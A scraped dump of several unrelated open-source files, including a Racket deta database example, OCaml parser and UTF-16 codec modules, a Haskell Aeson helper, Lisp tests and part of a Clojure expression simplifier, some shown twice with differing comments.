 (create-table! conn 'book)
 (insert! conn
          (make-book #:title "To Kill a Mockingbird"
                     #:author "Harper Lee"
                     #:year-published 1960)
          (make-book #:title "1984"
                     #:author "George Orwell"
                     #:year-published 1949)
          (make-book #:title "The Lord of the Rings"
                     #:author "J.R.R. Tolkien"
                     #:year-published 1955)
          (make-book #:title "The Catcher in the Rye"
                     #:author "J.D. Salinger"
                     #:year-published 1949)))
;; Query for books published strictly before `year`, written without the
;; threading macro: (~> q (where e)) expands to exactly (where q e).
(define (books-before year)
  (where (from book #:as b)
         (< b.year-published ,year)))
;; Query for books published in [start-year, end-year], unthreaded form of
;; the original (~> (from ...) (where ...)) pipeline.
(define (books-between start-year end-year)
  (where (from book #:as b)
         (between b.year-published ,start-year ,end-year)))
;; Print the titles matching each query.
(displayln "Books published before 1950:")
(for ([b (in-entities conn (books-before 1950))])
  (displayln (book-title b)))

(displayln "")
(displayln "Books published between 1950 and 1970:")
(for ([b (in-entities conn (books-between 1950 1970))])
  (displayln (book-title b)))

;; Virtual (non-persisted) schema used to receive the aggregate query below.
(define-schema book-stats
  #:virtual
  ([year integer/f]
   [books integer/f]))

(displayln "")
(displayln "Statistics:")
;; Books-per-year aggregate, newest year first, projected onto `book-stats`.
(for ([stats (in-entities conn (~> (from book #:as b)
                                   (select b.year-published (count *))
                                   (group-by b.year-published)
                                   (order-by ([b.year-published #:desc]))
                                   (project-onto book-stats-schema)))])
  (displayln (format "year: ~a books: ~a"
                     (book-stats-year stats)
                     (book-stats-books stats))))

;; Delete the 1950-1970 rows, then re-run the query to show it is now empty.
(query-exec conn (delete (books-between 1950 1970)))

(displayln "")
(displayln "Books published between 1950 and 1970:")
(for ([b (in-entities conn (books-between 1950 1970))])
  (displayln (book-title b)))
| null | https://raw.githubusercontent.com/Bogdanp/deta/503860156f5cb1dbecb4339e299ee86a10b66d32/examples/books.rkt | racket | #lang racket/base
(require db
deta
threading)
(define-schema book
([id id/f #:primary-key #:auto-increment]
[title string/f]
[author string/f]
[year-published integer/f #:nullable]))
(define conn
(sqlite3-connect #:database 'memory))
(void
(create-table! conn 'book)
(insert! conn
(make-book #:title "To Kill a Mockingbird"
#:author "Harper Lee"
#:year-published 1960)
(make-book #:title "1984"
#:author "George Orwell"
#:year-published 1949)
(make-book #:title "The Lord of the Rings"
#:author "J.R.R. Tolkien"
#:year-published 1955)
(make-book #:title "The Catcher in the Rye"
#:author "J.D. Salinger"
#:year-published 1949)))
(define (books-before year)
(~> (from book #:as b)
(where (< b.year-published ,year))))
(define (books-between start-year end-year)
(~> (from book #:as b)
(where (between b.year-published ,start-year ,end-year))))
(displayln "Books published before 1950:")
(for ([b (in-entities conn (books-before 1950))])
(displayln (book-title b)))
(displayln "")
(displayln "Books published between 1950 and 1970:")
(for ([b (in-entities conn (books-between 1950 1970))])
(displayln (book-title b)))
(define-schema book-stats
#:virtual
([year integer/f]
[books integer/f]))
(displayln "")
(displayln "Statistics:")
(for ([stats (in-entities conn (~> (from book #:as b)
(select b.year-published (count *))
(group-by b.year-published)
(order-by ([b.year-published #:desc]))
(project-onto book-stats-schema)))])
(displayln (format "year: ~a books: ~a"
(book-stats-year stats)
(book-stats-books stats))))
(query-exec conn (delete (books-between 1950 1970)))
(displayln "")
(displayln "Books published between 1950 and 1970:")
(for ([b (in-entities conn (books-between 1950 1970))])
(displayln (book-title b)))
| |
34d4191f664328d4bd1876518ec671c83f2d710eacfe9971a0c125d23ece53b1 | ayazhafiz/plts | load.ml | let string_of_position ({ pos_lnum; pos_cnum; pos_bol; _ } : Lexing.position) =
Printf.sprintf "%d:%d" pos_lnum (pos_cnum - pos_bol + 1)
let parse_safe s =
let lexbuf = Lexing.from_string ~with_positions:true s in
try
let parsed = Parser.formula_entry Lexer.read lexbuf in
Ok parsed
with
| Lexer.SyntaxError what ->
Error
(Printf.sprintf "Syntax error: %s at %s" what
(string_of_position lexbuf.lex_curr_p))
| Parser.Error ->
Error
(Printf.sprintf "Parse error at %s"
(string_of_position lexbuf.lex_curr_p))
let parse s = Result.get_ok (parse_safe s)
| null | https://raw.githubusercontent.com/ayazhafiz/plts/ea0cb5ab8f5fb98e421c4a2dc8577b2454d86442/logic/load.ml | ocaml | let string_of_position ({ pos_lnum; pos_cnum; pos_bol; _ } : Lexing.position) =
Printf.sprintf "%d:%d" pos_lnum (pos_cnum - pos_bol + 1)
(* Parse a formula from [s]. Returns [Ok ast] on success, or [Error msg]
   where [msg] locates the failure via the lexbuf's current position
   (position tracking is enabled by [~with_positions:true]). *)
let parse_safe s =
  let lexbuf = Lexing.from_string ~with_positions:true s in
  try
    let parsed = Parser.formula_entry Lexer.read lexbuf in
    Ok parsed
  with
  | Lexer.SyntaxError what ->
      (* Lexer-level failure: the lexer supplies its own message. *)
      Error
        (Printf.sprintf "Syntax error: %s at %s" what
           (string_of_position lexbuf.lex_curr_p))
  | Parser.Error ->
      (* Grammar-level failure: only the position is available. *)
      Error
        (Printf.sprintf "Parse error at %s"
           (string_of_position lexbuf.lex_curr_p))
(* Partial variant of [parse_safe]: raises [Invalid_argument] on failure and
   discards the diagnostic message. Intended for trusted input. *)
let parse s = Result.get_ok (parse_safe s)
| |
87a23649ac2c602484df45ffea68970d057a4fb08dddc938a274a724ea93508a | dbuenzli/hyperbib | suggestion_html.mli | ---------------------------------------------------------------------------
Copyright ( c ) 2022 The hyperbib programmers . All rights reserved .
Distributed under the ISC license , see terms at the end of the file .
---------------------------------------------------------------------------
Copyright (c) 2022 The hyperbib programmers. All rights reserved.
Distributed under the ISC license, see terms at the end of the file.
---------------------------------------------------------------------------*)
open Hyperbib.Std

(** HTML renderers for the bibliography "suggestion" workflow.
    NOTE(review): the summaries below are inferred from names and
    signatures only — confirm against the implementation. *)

val page_404 : Page.Gen.t -> self:Kurl.t -> Page.t
(** Not-found page for a suggestion URL; [self] is the requested endpoint. *)

val email_field : string
(** Form field name for the suggester's e-mail address. *)

val bot_honeypot_field : string
(** Name of a hidden honeypot form field, presumably for bot detection. *)

val confirm_delete :
  Page.Gen.t -> Suggestion.t -> El.html
(** Confirmation fragment shown before deleting a suggestion. *)

val suggest_form :
  ?force_rescue:bool -> ?msg:El.html -> Page.Gen.t -> Suggestion.t -> El.html
(** Suggestion submission form; [?msg] is an optional message to embed. *)

val created : Page.Gen.t -> Suggestion.t -> Page.t
(** Page acknowledging a newly created suggestion. *)

val view_fields :
  ?no_ui:bool -> Page.Gen.t -> self:Kurl.t -> Suggestion.t -> El.html
(** Rendering of a suggestion's fields; [?no_ui] presumably suppresses
    interactive controls. *)

val integrate : Page.Gen.t -> Suggestion.t -> form:El.html -> Page.t
(** Page for integrating a suggestion into the bibliography, embedding
    [form]. *)

val need_a_doi_or_suggestion : El.html
(** Static fragment asking for a DOI or a textual suggestion. *)

val index : Page.Gen.t -> Suggestion.t list -> is_full:bool -> Page.t
(** Suggestion listing page; [is_full] presumably toggles a full listing. *)
---------------------------------------------------------------------------
Copyright ( c ) 2022 The hyperbib programmers
Permission to use , copy , modify , and/or distribute this software for any
purpose with or without fee is hereby granted , provided that the above
copyright notice and this permission notice appear in all copies .
THE SOFTWARE IS PROVIDED " AS IS " AND THE AUTHOR DISCLAIMS ALL WARRANTIES
WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS . IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
ANY SPECIAL , DIRECT , INDIRECT , OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
RESULTING FROM LOSS OF USE , DATA OR PROFITS , WHETHER IN AN
ACTION OF CONTRACT , NEGLIGENCE OR OTHER TORTIOUS ACTION , ARISING OUT OF
OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE .
---------------------------------------------------------------------------
Copyright (c) 2022 The hyperbib programmers
Permission to use, copy, modify, and/or distribute this software for any
purpose with or without fee is hereby granted, provided that the above
copyright notice and this permission notice appear in all copies.
THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
---------------------------------------------------------------------------*)
| null | https://raw.githubusercontent.com/dbuenzli/hyperbib/a1def764f7f58b29bd732dacaa167e73497f6175/src/html/suggestion_html.mli | ocaml | ---------------------------------------------------------------------------
Copyright ( c ) 2022 The hyperbib programmers . All rights reserved .
Distributed under the ISC license , see terms at the end of the file .
---------------------------------------------------------------------------
Copyright (c) 2022 The hyperbib programmers. All rights reserved.
Distributed under the ISC license, see terms at the end of the file.
---------------------------------------------------------------------------*)
open Hyperbib.Std
val page_404 : Page.Gen.t -> self:Kurl.t -> Page.t
val email_field : string
val bot_honeypot_field : string
val confirm_delete :
Page.Gen.t -> Suggestion.t -> El.html
val suggest_form :
?force_rescue:bool -> ?msg:El.html -> Page.Gen.t -> Suggestion.t -> El.html
val created : Page.Gen.t -> Suggestion.t -> Page.t
val view_fields :
?no_ui:bool -> Page.Gen.t -> self:Kurl.t -> Suggestion.t -> El.html
val integrate : Page.Gen.t -> Suggestion.t -> form:El.html -> Page.t
val need_a_doi_or_suggestion : El.html
val index : Page.Gen.t -> Suggestion.t list -> is_full:bool -> Page.t
---------------------------------------------------------------------------
Copyright ( c ) 2022 The hyperbib programmers
Permission to use , copy , modify , and/or distribute this software for any
purpose with or without fee is hereby granted , provided that the above
copyright notice and this permission notice appear in all copies .
THE SOFTWARE IS PROVIDED " AS IS " AND THE AUTHOR DISCLAIMS ALL WARRANTIES
WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS . IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
ANY SPECIAL , DIRECT , INDIRECT , OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
RESULTING FROM LOSS OF USE , DATA OR PROFITS , WHETHER IN AN
ACTION OF CONTRACT , NEGLIGENCE OR OTHER TORTIOUS ACTION , ARISING OUT OF
OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE .
---------------------------------------------------------------------------
Copyright (c) 2022 The hyperbib programmers
Permission to use, copy, modify, and/or distribute this software for any
purpose with or without fee is hereby granted, provided that the above
copyright notice and this permission notice appear in all copies.
THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
---------------------------------------------------------------------------*)
| |
4ec54abee64878b1274eb68b98f241891ef903717301c1ff35631b17d83b7166 | ItsMeijers/Lambdabox | Extended.hs | {-# LANGUAGE OverloadedStrings #-}
module Data.Aeson.Extended
( module Data.Aeson
, module Data.Aeson.Types
, typeToKindOptions
, Unit(..)
) where
import Data.Aeson
import Data.Aeson.Types
typeToKindOptions :: Options
typeToKindOptions = defaultOptions { fieldLabelModifier = t2k }
where t2k "kind" = "type"
t2k name = name
data Unit = Unit
instance FromJSON Unit where
parseJSON _ = pure Unit | null | https://raw.githubusercontent.com/ItsMeijers/Lambdabox/c19a8ae7d37b9f8ab5054d558fe788a5d4483092/src/Data/Aeson/Extended.hs | haskell | # LANGUAGE OverloadedStrings # |
module Data.Aeson.Extended
( module Data.Aeson
, module Data.Aeson.Types
, typeToKindOptions
, Unit(..)
) where
import Data.Aeson
import Data.Aeson.Types
typeToKindOptions :: Options
typeToKindOptions = defaultOptions { fieldLabelModifier = t2k }
where t2k "kind" = "type"
t2k name = name
data Unit = Unit
instance FromJSON Unit where
parseJSON _ = pure Unit |
d082df553e73ea25a71f68b1b6a149fef0cf6b027eb87c918b003b7881fe2382 | hspec/sensei | HTTPSpec.hs | {-# LANGUAGE OverloadedStrings #-}
module HTTPSpec (spec) where
import Helper
import Test.Hspec.Wai
import HTTP
spec :: Spec
spec = do
describe "app" $ do
with (return $ app $ return (True, "hello")) $ do
it "returns 200 on success" $ do
get "/" `shouldRespondWith` 200
with (return $ app $ return (False, "hello")) $ do
it "return 500 on failure" $ do
get "/" `shouldRespondWith` 500
| null | https://raw.githubusercontent.com/hspec/sensei/1af44981b3448d1298e6a363e037ea2978cc6392/test/HTTPSpec.hs | haskell | # LANGUAGE OverloadedStrings # | module HTTPSpec (spec) where
import Helper
import Test.Hspec.Wai
import HTTP
spec :: Spec
spec = do
describe "app" $ do
with (return $ app $ return (True, "hello")) $ do
it "returns 200 on success" $ do
get "/" `shouldRespondWith` 200
with (return $ app $ return (False, "hello")) $ do
it "return 500 on failure" $ do
get "/" `shouldRespondWith` 500
|
f42a45f2e9ba7b4934be2e48f03f440c24dba2771454c414963f3ecdc5a0d24f | patoline/patoline | UTF16.ml | open UChar
include UTF.Make(
struct
* Encode a unicode character into a UTF16 string .
* Argument :
* i : the unicode character .
* Returns a string of size either 2 or 4 .
* Raise invalid_arg if i is not in the U+0000 .. U+10FFFF range .
* Encode a unicode character into a UTF16 string.
* Argument:
* i : the unicode character.
* Returns a string of size either 2 or 4.
* Raise invalid_arg if i is not in the U+0000..U+10FFFF range.
*)
let encode : uchar -> string = fun u ->
if u < 0 || u > 0x10FFFF then
raise (invalid_arg "UF16.encode")
else if u < 0x10000 then
let s = Bytes.create 2 in
Bytes.set s 0 (char_of_int ((u lsr 8) land 0xFF));
Bytes.set s 1 (char_of_int (u land 0xFF));
Bytes.to_string s
else
let u' = u - 0x10000 in
let w1 = ((u' lsr 10) land 0b1111111111) lor 0xD800 in
let w2 = (u' land 0b1111111111) lor 0xDC00 in
let s = Bytes.create 4 in
Bytes.set s 0 (char_of_int ((w1 lsr 8) land 0xFF));
Bytes.set s 1 (char_of_int (w1 land 0xFF));
Bytes.set s 2 (char_of_int ((w2 lsr 8) land 0xFF));
Bytes.set s 3 (char_of_int (w2 land 0xFF));
Bytes.to_string s
(*
* Decode a UTF16 character at a given position in a string.
* Arguments:
* s : the string,
* i : index where to look.
* Returns a couple (c, l) where c is the code of the character and l is the
* number of bytes read.
* Raise invalid_arg if no valid UTF16 character starts at poisition i in s.
*)
let decode : string -> index -> (uchar * int) = fun s i ->
let l = String.length s in
if i > l - 1 then
raise (invalid_arg "UTF16.decode")
else
let w1 = ((Char.code s.[i]) lsl 16) land (Char.code s.[i+1]) in
if w1 < 0xD800 || w1 > 0xDFFF then
(w1, 2)
else if w1 >= 0xD800 && w1 <= 0xD8FF then
raise (invalid_arg "UTF16.decode")
else if i > l - 3 then
raise (invalid_arg "UTF16.decode")
else
let w2 = ((Char.code s.[i+2]) lsl 16) land (Char.code s.[i+3]) in
if w2 < 0xDC00 || w2 > 0xDFFF then
raise (invalid_arg "UTF16.decode")
else
let u1 = w1 land 0b1111111111 in
let u2 = w2 land 0b1111111111 in
let u = (u1 lsl 10) lor u2 in
let u = u + 0x10000 in
(u, 4)
end)
| null | https://raw.githubusercontent.com/patoline/patoline/3dcd41fdff64895d795d4a78baa27d572b161081/unicodelib/UTF16.ml | ocaml |
* Decode a UTF16 character at a given position in a string.
* Arguments:
* s : the string,
* i : index where to look.
* Returns a couple (c, l) where c is the code of the character and l is the
* number of bytes read.
* Raise invalid_arg if no valid UTF16 character starts at poisition i in s.
| open UChar
include UTF.Make(
struct
* Encode a unicode character into a UTF16 string .
* Argument :
* i : the unicode character .
* Returns a string of size either 2 or 4 .
* Raise invalid_arg if i is not in the U+0000 .. U+10FFFF range .
* Encode a unicode character into a UTF16 string.
* Argument:
* i : the unicode character.
* Returns a string of size either 2 or 4.
* Raise invalid_arg if i is not in the U+0000..U+10FFFF range.
*)
let encode : uchar -> string = fun u ->
if u < 0 || u > 0x10FFFF then
raise (invalid_arg "UF16.encode")
else if u < 0x10000 then
let s = Bytes.create 2 in
Bytes.set s 0 (char_of_int ((u lsr 8) land 0xFF));
Bytes.set s 1 (char_of_int (u land 0xFF));
Bytes.to_string s
else
let u' = u - 0x10000 in
let w1 = ((u' lsr 10) land 0b1111111111) lor 0xD800 in
let w2 = (u' land 0b1111111111) lor 0xDC00 in
let s = Bytes.create 4 in
Bytes.set s 0 (char_of_int ((w1 lsr 8) land 0xFF));
Bytes.set s 1 (char_of_int (w1 land 0xFF));
Bytes.set s 2 (char_of_int ((w2 lsr 8) land 0xFF));
Bytes.set s 3 (char_of_int (w2 land 0xFF));
Bytes.to_string s
let decode : string -> index -> (uchar * int) = fun s i ->
let l = String.length s in
if i > l - 1 then
raise (invalid_arg "UTF16.decode")
else
let w1 = ((Char.code s.[i]) lsl 16) land (Char.code s.[i+1]) in
if w1 < 0xD800 || w1 > 0xDFFF then
(w1, 2)
else if w1 >= 0xD800 && w1 <= 0xD8FF then
raise (invalid_arg "UTF16.decode")
else if i > l - 3 then
raise (invalid_arg "UTF16.decode")
else
let w2 = ((Char.code s.[i+2]) lsl 16) land (Char.code s.[i+3]) in
if w2 < 0xDC00 || w2 > 0xDFFF then
raise (invalid_arg "UTF16.decode")
else
let u1 = w1 land 0b1111111111 in
let u2 = w2 land 0b1111111111 in
let u = (u1 lsl 10) lor u2 in
let u = u + 0x10000 in
(u, 4)
end)
|
774cbd7c452870040fcc84b6398f007587b34aa8ffe4dc3af4486d95126c4962 | McCLIM/McCLIM | sequence.lisp | ;;; ---------------------------------------------------------------------------
;;; License: LGPL-2.1+ (See file 'Copyright' for details).
;;; ---------------------------------------------------------------------------
;;;
( c ) copyright 2019 - 2020 Jan Moringen < >
;;;
;;; ---------------------------------------------------------------------------
;;;
;;; Smoke test for inspecting sequences.
;;;
(cl:in-package #:clouseau.test)
(def-suite* :clouseau.objects.sequence
:in :clouseau)
(defclass my-sequence (sequence standard-object)
())
(defmethod sequence:length ((sequence my-sequence))
3)
(defmethod sequence:elt ((sequence my-sequence) (index t))
(case index
(0 :a)
(1 :b)
(2 :c)))
(test sequence.object-state-class.smoke
"Test `object-state-class' for extended sequences."
(object-state-class-cases
(list (make-instance 'my-sequence) 'clouseau::inspected-extended-sequence)))
| null | https://raw.githubusercontent.com/McCLIM/McCLIM/7c890f1ac79f0c6f36866c47af89398e2f05b343/Apps/Clouseau/test/objects/sequence.lisp | lisp | ---------------------------------------------------------------------------
License: LGPL-2.1+ (See file 'Copyright' for details).
---------------------------------------------------------------------------
---------------------------------------------------------------------------
Smoke test for inspecting sequences.
| ( c ) copyright 2019 - 2020 Jan Moringen < >
(cl:in-package #:clouseau.test)
(def-suite* :clouseau.objects.sequence
:in :clouseau)
(defclass my-sequence (sequence standard-object)
())
(defmethod sequence:length ((sequence my-sequence))
3)
(defmethod sequence:elt ((sequence my-sequence) (index t))
(case index
(0 :a)
(1 :b)
(2 :c)))
(test sequence.object-state-class.smoke
"Test `object-state-class' for extended sequences."
(object-state-class-cases
(list (make-instance 'my-sequence) 'clouseau::inspected-extended-sequence)))
|
e3d02779b5f6c9a61d2bb376a8cb4869834ce9260e9636610ca7c56b888e0e5e | robert-strandh/Cluster | generation-test.lisp | (cl:in-package #:cluster-test.disassembler)
(defun test-all-x86 ()
(let* ((generator (make-code-command-generator))
(test-program
(generate-test-commands generator c::*instruction-descriptors*)))
(assert-assembler-equal-encoding test-program)))
| null | https://raw.githubusercontent.com/robert-strandh/Cluster/370410b1c685f2afd77f959a46ba49923a31a33c/Test/Disassembler/generation-test.lisp | lisp | (cl:in-package #:cluster-test.disassembler)
(defun test-all-x86 ()
(let* ((generator (make-code-command-generator))
(test-program
(generate-test-commands generator c::*instruction-descriptors*)))
(assert-assembler-equal-encoding test-program)))
| |
852d44519f86f647355354b024233397a7f1ededf8067be810094ed0c9edc5f1 | sicmutils/sicmutils | simplify.cljc | #_"SPDX-License-Identifier: GPL-3.0"
(ns sicmutils.simplify
(:require [sicmutils.expression :as x]
[sicmutils.expression.analyze :as a]
[sicmutils.polynomial :as poly]
[sicmutils.polynomial.factor :as factor]
[sicmutils.rational-function :as rf]
[sicmutils.simplify.rules :as rules]
[sicmutils.value :as v]
[taoensso.timbre :as log])
#?(:clj
(:import (java.util.concurrent TimeoutException))))
(defn- unless-timeout
"Returns a function that invokes f, but catches TimeoutException;
if that exception is caught, then x is returned in lieu of (f x)."
[f]
(fn [x]
(try (f x)
(catch #?(:clj TimeoutException :cljs js/Error) _
(log/warn
(str "simplifier timed out: must have been a complicated expression"))
x))))
(defn ^:no-doc poly-analyzer
"An analyzer capable of simplifying sums and products, but unable to cancel
across the fraction bar.
NOTE: I think this is fpf:analyzer in the scheme code."
[]
(let [gensym (a/monotonic-symbol-generator "-s-")]
(a/make-analyzer poly/analyzer gensym)))
(defn ^:no-doc rational-function-analyzer
"An analyzer capable of simplifying expressions built out of rational
functions.
NOTE: This is rcf:analyzer."
[]
(let [gensym (a/monotonic-symbol-generator "-r-")]
(a/make-analyzer rf/analyzer gensym)))
(def ^:dynamic *poly-simplify*
(memoize
(a/expression-simplifier
(poly-analyzer))))
(def ^:dynamic *rf-simplify*
(unless-timeout
(memoize
(a/expression-simplifier
(rational-function-analyzer)))))
(defn hermetic-simplify-fixture
"Returns the result of executing the supplied `thunk` in an environment where
the [[*rf-simplify*]] and [[*poly-simplify*]] are not memoized."
[thunk]
(binding [*rf-simplify* (unless-timeout
(a/expression-simplifier
(rational-function-analyzer)))
*poly-simplify* (unless-timeout
(a/expression-simplifier
(poly-analyzer)))]
(thunk)))
(defn- simplify-and-flatten [expr]
(*poly-simplify*
(*rf-simplify* expr)))
(defn- simplify-until-stable
[rule-simplify canonicalize]
(fn [expr]
(let [new-expr (rule-simplify expr)]
(if (= expr new-expr)
expr
(let [canonicalized-expr (canonicalize new-expr)]
(cond (= canonicalized-expr expr) expr
(v/zero?
(*poly-simplify*
(list '- expr canonicalized-expr)))
canonicalized-expr
:else (recur canonicalized-expr)))))))
(defn- simplify-and-canonicalize
[rule-simplify canonicalize]
(fn [expr]
(let [new-expr (rule-simplify expr)]
(if (= expr new-expr)
expr
(canonicalize new-expr)))))
(def ^:private clear-square-roots-of-perfect-squares
(-> (comp (rules/universal-reductions #'*rf-simplify*)
factor/root-out-squares)
(simplify-and-canonicalize simplify-and-flatten)))
(defn- only-if
"If the supplied `bool` is true, returns `f`, else returns `identity`."
[bool f]
(if bool
f
identity))
(let [universal-reductions (rules/universal-reductions #'*rf-simplify*)
sqrt-contract (rules/sqrt-contract #'*rf-simplify*)
sqrt-expand (rules/sqrt-expand #'*rf-simplify*)
log-contract (rules/log-contract #'*rf-simplify*)
sincos-random (rules/sincos-random #'*rf-simplify*)
sincos-flush-ones (rules/sincos-flush-ones #'*rf-simplify*)]
(defn simplify-expression
"Simplifies an expression representing a complex number. TODO say more!"
[expr]
(let [syms (x/variables-in expr)
sqrt? (rules/occurs-in? #{'sqrt} syms)
full-sqrt? (and rules/*sqrt-factor-simplify?*
(rules/occurs-in? #{'sqrt} syms))
logexp? (rules/occurs-in? #{'log 'exp} syms)
trig? (rules/occurs-in? #{'sin 'cos 'tan 'cot 'sec 'csc} syms)
partials? (rules/occurs-in? #{'partial} syms)
simple
(comp (only-if rules/*divide-numbers-through-simplify?*
rules/divide-numbers-through)
(only-if sqrt? clear-square-roots-of-perfect-squares)
(only-if full-sqrt?
(comp (-> (comp universal-reductions sqrt-expand)
(simplify-until-stable simplify-and-flatten))
clear-square-roots-of-perfect-squares
(-> sqrt-contract
(simplify-until-stable simplify-and-flatten))))
(only-if trig?
(comp (-> (comp universal-reductions rules/sincos->trig)
(simplify-and-canonicalize simplify-and-flatten))
(-> rules/complex-trig
(simplify-and-canonicalize simplify-and-flatten))
(-> rules/angular-parity
(simplify-and-canonicalize simplify-and-flatten))
(-> sincos-random
(simplify-until-stable simplify-and-flatten))
(-> rules/sin-sq->cos-sq
(simplify-and-canonicalize simplify-and-flatten))
(-> sincos-flush-ones
(simplify-and-canonicalize simplify-and-flatten))
(only-if rules/*trig-product-to-sum-simplify?*
(-> rules/trig:product->sum
(simplify-and-canonicalize simplify-and-flatten)))
(-> universal-reductions
(simplify-and-canonicalize simplify-and-flatten))
(-> sincos-random
(simplify-until-stable simplify-and-flatten))
(-> rules/sin-sq->cos-sq
(simplify-and-canonicalize simplify-and-flatten))
(-> sincos-flush-ones
(simplify-and-canonicalize simplify-and-flatten))))
(only-if logexp?
(comp (-> universal-reductions
(simplify-and-canonicalize simplify-and-flatten))
(-> (comp rules/log-expand
rules/exp-expand)
(simplify-until-stable simplify-and-flatten))
(-> (comp log-contract
rules/exp-contract)
(simplify-until-stable simplify-and-flatten))))
(-> (comp universal-reductions
(only-if logexp?
(comp rules/log-expand
rules/exp-expand))
(only-if sqrt?
sqrt-expand))
(simplify-until-stable simplify-and-flatten))
(only-if trig?
(-> rules/angular-parity
(simplify-and-canonicalize simplify-and-flatten)))
(-> rules/trig->sincos
(simplify-and-canonicalize simplify-and-flatten))
TODO this should happen at the END , only a single time , after
;; everything else is done. It's not right to get operator
;; multiplication going and then attempt to canonicalize the
;; expression, even if it sort of works.
(only-if partials?
(-> rules/canonicalize-partials
(simplify-and-canonicalize simplify-and-flatten)))
simplify-and-flatten)]
(simple expr))))
| null | https://raw.githubusercontent.com/sicmutils/sicmutils/ce763b31153eb9253f165bd5b4e4e6a6087bf730/src/sicmutils/simplify.cljc | clojure |
everything else is done. It's not right to get operator
multiplication going and then attempt to canonicalize the
expression, even if it sort of works. | #_"SPDX-License-Identifier: GPL-3.0"
(ns sicmutils.simplify
(:require [sicmutils.expression :as x]
[sicmutils.expression.analyze :as a]
[sicmutils.polynomial :as poly]
[sicmutils.polynomial.factor :as factor]
[sicmutils.rational-function :as rf]
[sicmutils.simplify.rules :as rules]
[sicmutils.value :as v]
[taoensso.timbre :as log])
#?(:clj
(:import (java.util.concurrent TimeoutException))))
(defn- unless-timeout
if that exception is caught, then x is returned in lieu of (f x)."
[f]
(fn [x]
(try (f x)
(catch #?(:clj TimeoutException :cljs js/Error) _
(log/warn
(str "simplifier timed out: must have been a complicated expression"))
x))))
(defn ^:no-doc poly-analyzer
"An analyzer capable of simplifying sums and products, but unable to cancel
across the fraction bar.
NOTE: I think this is fpf:analyzer in the scheme code."
[]
(let [gensym (a/monotonic-symbol-generator "-s-")]
(a/make-analyzer poly/analyzer gensym)))
(defn ^:no-doc rational-function-analyzer
"An analyzer capable of simplifying expressions built out of rational
functions.
NOTE: This is rcf:analyzer."
[]
(let [gensym (a/monotonic-symbol-generator "-r-")]
(a/make-analyzer rf/analyzer gensym)))
(def ^:dynamic *poly-simplify*
(memoize
(a/expression-simplifier
(poly-analyzer))))
(def ^:dynamic *rf-simplify*
(unless-timeout
(memoize
(a/expression-simplifier
(rational-function-analyzer)))))
(defn hermetic-simplify-fixture
"Returns the result of executing the supplied `thunk` in an environment where
the [[*rf-simplify*]] and [[*poly-simplify*]] are not memoized."
[thunk]
(binding [*rf-simplify* (unless-timeout
(a/expression-simplifier
(rational-function-analyzer)))
*poly-simplify* (unless-timeout
(a/expression-simplifier
(poly-analyzer)))]
(thunk)))
(defn- simplify-and-flatten [expr]
(*poly-simplify*
(*rf-simplify* expr)))
(defn- simplify-until-stable
[rule-simplify canonicalize]
(fn [expr]
(let [new-expr (rule-simplify expr)]
(if (= expr new-expr)
expr
(let [canonicalized-expr (canonicalize new-expr)]
(cond (= canonicalized-expr expr) expr
(v/zero?
(*poly-simplify*
(list '- expr canonicalized-expr)))
canonicalized-expr
:else (recur canonicalized-expr)))))))
(defn- simplify-and-canonicalize
[rule-simplify canonicalize]
(fn [expr]
(let [new-expr (rule-simplify expr)]
(if (= expr new-expr)
expr
(canonicalize new-expr)))))
(def ^:private clear-square-roots-of-perfect-squares
(-> (comp (rules/universal-reductions #'*rf-simplify*)
factor/root-out-squares)
(simplify-and-canonicalize simplify-and-flatten)))
(defn- only-if
"If the supplied `bool` is true, returns `f`, else returns `identity`."
[bool f]
(if bool
f
identity))
(let [universal-reductions (rules/universal-reductions #'*rf-simplify*)
sqrt-contract (rules/sqrt-contract #'*rf-simplify*)
sqrt-expand (rules/sqrt-expand #'*rf-simplify*)
log-contract (rules/log-contract #'*rf-simplify*)
sincos-random (rules/sincos-random #'*rf-simplify*)
sincos-flush-ones (rules/sincos-flush-ones #'*rf-simplify*)]
(defn simplify-expression
"Simplifies an expression representing a complex number. TODO say more!"
[expr]
(let [syms (x/variables-in expr)
sqrt? (rules/occurs-in? #{'sqrt} syms)
full-sqrt? (and rules/*sqrt-factor-simplify?*
(rules/occurs-in? #{'sqrt} syms))
logexp? (rules/occurs-in? #{'log 'exp} syms)
trig? (rules/occurs-in? #{'sin 'cos 'tan 'cot 'sec 'csc} syms)
partials? (rules/occurs-in? #{'partial} syms)
simple
(comp (only-if rules/*divide-numbers-through-simplify?*
rules/divide-numbers-through)
(only-if sqrt? clear-square-roots-of-perfect-squares)
(only-if full-sqrt?
(comp (-> (comp universal-reductions sqrt-expand)
(simplify-until-stable simplify-and-flatten))
clear-square-roots-of-perfect-squares
